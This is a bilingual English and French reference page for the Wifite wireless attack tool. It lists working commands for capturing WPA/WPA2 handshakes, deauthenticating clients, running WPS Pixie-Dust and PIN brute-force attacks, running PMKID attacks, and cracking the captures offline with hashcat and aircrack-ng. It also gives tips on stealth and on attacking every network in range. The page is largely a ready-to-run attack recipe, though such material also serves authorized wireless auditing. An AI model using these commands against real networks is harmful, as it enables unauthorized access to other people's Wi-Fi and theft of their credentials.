Wifite
Outil d'attaque wireless automatisé. Encapsule aircrack-ng, hashcat et d'autres outils pour automatiser la capture de handshakes WPA/WPA2, les attaques WPS et le cracking PMKID. Automated wireless attack tool. Wraps aircrack-ng, hashcat, and other tools to automate WPA/WPA2 handshake capture, WPS attacks, and PMKID cracking.
↗ https://github.com/derv82/wifite2Overview
Wifite automates the process of auditing wireless networks. It handles monitor mode, target selection, handshake capture, deauthentication, WPS PIN/Pixie-Dust attacks, and PMKID attacks — all with a simple menu-driven interface.
Basic Usage
Launch and interactively select targets
sudo wifite
Attack all discovered networks automatically
sudo wifite --all
Attack only WPA networks
sudo wifite --wpa
Attack only WPS-enabled networks
sudo wifite --wps
Specify interface
sudo wifite -i wlan0
Specify wordlist for cracking
sudo wifite --dict /usr/share/wordlists/rockyou.txt
Attack Types
PMKID attack (no deauth needed — capture from AP beacon)
sudo wifite --pmkid
WPS Pixie-Dust attack (very fast against vulnerable routers)
sudo wifite --wps-pixie
WPS PIN brute-force
sudo wifite --wps-pin
Deauthentication (force handshake)
sudo wifite --no-pmkid # Force handshake-only mode
Capture handshake only (no cracking)
sudo wifite --no-crack
Use hashcat for cracking (GPU)
sudo wifite --use-hashcat
Filtering Targets
Only attack a specific BSSID
sudo wifite --bssid AA:BB:CC:DD:EE:FF
Only attack networks on a specific channel
sudo wifite --channel 6
Only attack networks with minimum signal strength
sudo wifite --min-power -60
Skip hidden networks
sudo wifite --skip-hidden
Ignore already-cracked networks
sudo wifite --ignore-cracked
Captured Handshakes
# Handshakes saved to: ./hs/ESSID_BSSID.cap
# Crack manually with hashcat:
hcxpcapngtool -o hash.hc22000 hs/Network-AA:BB:CC:DD:EE:FF.cap
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
Or with aircrack-ng:
aircrack-ng -w /usr/share/wordlists/rockyou.txt hs/Network-AA:BB:CC:DD:EE:FF.cap
Configuration
Set deauth count
sudo wifite --deauths 5
Set timeout per attack (seconds)
sudo wifite --wpa-attack-timeout 60
Skip aircrack, use only hashcat
sudo wifite --use-hashcat --no-aircrack
Tips
- WPS Pixie-Dust is very effective against older routers and takes under a minute when successful
- PMKID attack (Hcxdumptool mode) doesn’t require clients to be connected — much stealthier
- Always run
sudo airmon-ng check killbefore starting, or wifite will do it automatically - Captured
.capfiles can be cracked offline — no need to crack in the field
Help / Man page
wifite [flags]
Interface:
-i interface Wireless interface
--kill Kill interfering processes
Target selection:
--all Attack all targets
--bssid MAC Target specific BSSID
--essid NAME Target specific ESSID
--channel N Scan specific channel
--min-power dBm Minimum signal strength
Attack modes:
--wpa WPA/WPA2 networks
--wps WPS-enabled networks
--pmkid PMKID attack
--wps-pixie WPS Pixie-Dust
--wps-pin WPS PIN brute-force
Cracking:
--dict file Wordlist for cracking
--use-hashcat Use hashcat (GPU)
--no-crack Don't crack, just capture
Timing:
--deauths N Deauth packets to send (default: 10)
--wpa-attack-timeout N Seconds per WPA attack
--wps-timeout N Seconds per WPS attack
Vue d’ensemble
Wifite automatise l’audit des réseaux wireless. Il gère le mode monitor, la sélection de cibles, la capture de handshakes, la déauthentification, les attaques WPS PIN/Pixie-Dust, et les attaques PMKID : le tout avec une interface simple à base de menus.
Utilisation de base
# Lancer et sélectionner les cibles de manière interactive
sudo wifite
# Attaquer automatiquement tous les réseaux découverts
sudo wifite --all
# Attaquer uniquement les réseaux WPA
sudo wifite --wpa
# Attaquer uniquement les réseaux avec WPS activé
sudo wifite --wps
# Spécifier l'interface
sudo wifite -i wlan0
# Spécifier une wordlist pour le cracking
sudo wifite --dict /usr/share/wordlists/rockyou.txt
Types d’attaques
# Attaque PMKID (pas de déauthentification nécessaire : capture depuis le beacon de l'AP)
sudo wifite --pmkid
# Attaque WPS Pixie-Dust (très rapide contre les routeurs vulnérables)
sudo wifite --wps-pixie
# Brute-force du PIN WPS
sudo wifite --wps-pin
# Déauthentification (forcer le handshake)
sudo wifite --no-pmkid # Force le mode handshake uniquement
# Capturer uniquement le handshake (sans cracking)
sudo wifite --no-crack
# Utiliser hashcat pour le cracking (GPU)
sudo wifite --use-hashcat
Filtrer les cibles
# Attaquer uniquement un BSSID spécifique
sudo wifite --bssid AA:BB:CC:DD:EE:FF
# Attaquer uniquement les réseaux sur un canal spécifique
sudo wifite --channel 6
# Attaquer uniquement les réseaux avec une puissance de signal minimale
sudo wifite --min-power -60
# Ignorer les réseaux masqués
sudo wifite --skip-hidden
# Ignorer les réseaux déjà crackés
sudo wifite --ignore-cracked
Handshakes capturés
# Handshakes sauvegardés dans : ./hs/ESSID_BSSID.cap
# Cracker manuellement avec hashcat :
hcxpcapngtool -o hash.hc22000 hs/Network-AA:BB:CC:DD:EE:FF.cap
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
Ou avec aircrack-ng :
aircrack-ng -w /usr/share/wordlists/rockyou.txt hs/Network-AA:BB:CC:DD:EE:FF.cap
Configuration
# Définir le nombre de déauthentifications
sudo wifite --deauths 5
# Définir le timeout par attaque (secondes)
sudo wifite --wpa-attack-timeout 60
# Ignorer aircrack, utiliser uniquement hashcat
sudo wifite --use-hashcat --no-aircrack
Conseils
- WPS Pixie-Dust est très efficace contre les routeurs anciens et prend moins d’une minute en cas de succès
- L’attaque PMKID (mode Hcxdumptool) ne nécessite pas que les clients soient connectés : bien plus furtif
- Toujours lancer
sudo airmon-ng check killavant de démarrer, ou wifite le fera automatiquement - Les fichiers
.capcapturés peuvent être crackés hors ligne : pas besoin de cracker sur le terrain
Aide / Page de manuel
wifite [flags]
Interface:
-i interface Wireless interface
--kill Kill interfering processes
Target selection:
--all Attack all targets
--bssid MAC Target specific BSSID
--essid NAME Target specific ESSID
--channel N Scan specific channel
--min-power dBm Minimum signal strength
Attack modes:
--wpa WPA/WPA2 networks
--wps WPS-enabled networks
--pmkid PMKID attack
--wps-pixie WPS Pixie-Dust
--wps-pin WPS PIN brute-force
Cracking:
--dict file Wordlist for cracking
--use-hashcat Use hashcat (GPU)
--no-crack Don't crack, just capture
Timing:
--deauths N Deauth packets to send (default: 10)
--wpa-attack-timeout N Seconds per WPA attack
--wps-timeout N Seconds per WPS attack